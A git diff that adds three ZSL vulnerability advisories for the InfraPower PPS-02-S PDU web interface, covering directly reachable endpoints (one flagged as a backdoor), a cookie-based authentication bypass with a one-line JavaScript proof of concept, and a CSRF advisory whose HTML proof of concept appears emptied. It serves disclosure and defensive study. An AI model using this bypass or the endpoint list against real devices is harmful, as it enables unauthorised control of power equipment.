+Desc: Insecure Direct Object References occur when an application
+provides direct access to objects based on user-supplied input. As
+a result of this vulnerability attackers can bypass authorization
+and access resources and functionalities in the system directly, for
+example APIs, files, upload utilities, device settings, etc.
+
+Tested on: Linux 2.6.28 (armv5tel)
+lighttpd/1.4.30-devel-1321
+PHP/5.3.9
+SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2016-5373
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
+
+
+27.09.2016
+
+--
+
+
+GET /ConnPort.php
+GET /CSSSource.php
+GET /dball.php
+GET /doupgrate.php
+GET /IPSettings.php
+GET /ListFile.php
+GET /Menu.php
+GET /Ntp.php
+GET /PDUDetails_Ajax_Details.php
+GET /PDULog.php
+GET /PortSettings.php
+GET /production_test1.php ("backdoor")
+GET /UploadEXE.php
diff --git a/platforms/php/webapps/40645.txt
new file mode 100755
index 000000000..af27bb43b
--- /dev/null
+++ b/platforms/php/webapps/40645.txt
@@ -0,0 +1,142 @@ +InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: The device does not properly perform authentication, allowing +it to be bypassed through cookie manipulation. The vulnerable function +checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty +or not, allowing easy bypass of the user security mechanisms. 
+ +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5374 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php + + +27.09.2016 + +-- + + +(example) System.php: +--------------------- +1: init($_SESSION['ite']); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login'])) +/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){ +/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt"); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){ +/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF"; +/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0"; +/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0"; +/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: 
$_SESSION['ite'] = "4"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User']; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User']; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") { +/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") { +/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login']; +/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){ +/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") { +/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']); + +➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www +/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){ +/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) { +/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin()) 
+/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin()) + + +PoC: + +javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT" + +-- diff --git a/platforms/php/webapps/40646.txt b/platforms/php/webapps/40646.txt new file mode 100755 index 000000000..a38ac4923 --- /dev/null +++ b/platforms/php/webapps/40646.txt @@ -0,0 +1,53 @@ +InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with admin +privileges if a logged-in user visits a malicious web site. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5375 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php + + +27.09.2016 + +-- + + +PoC: + + + +
+ + + + + + +
+ +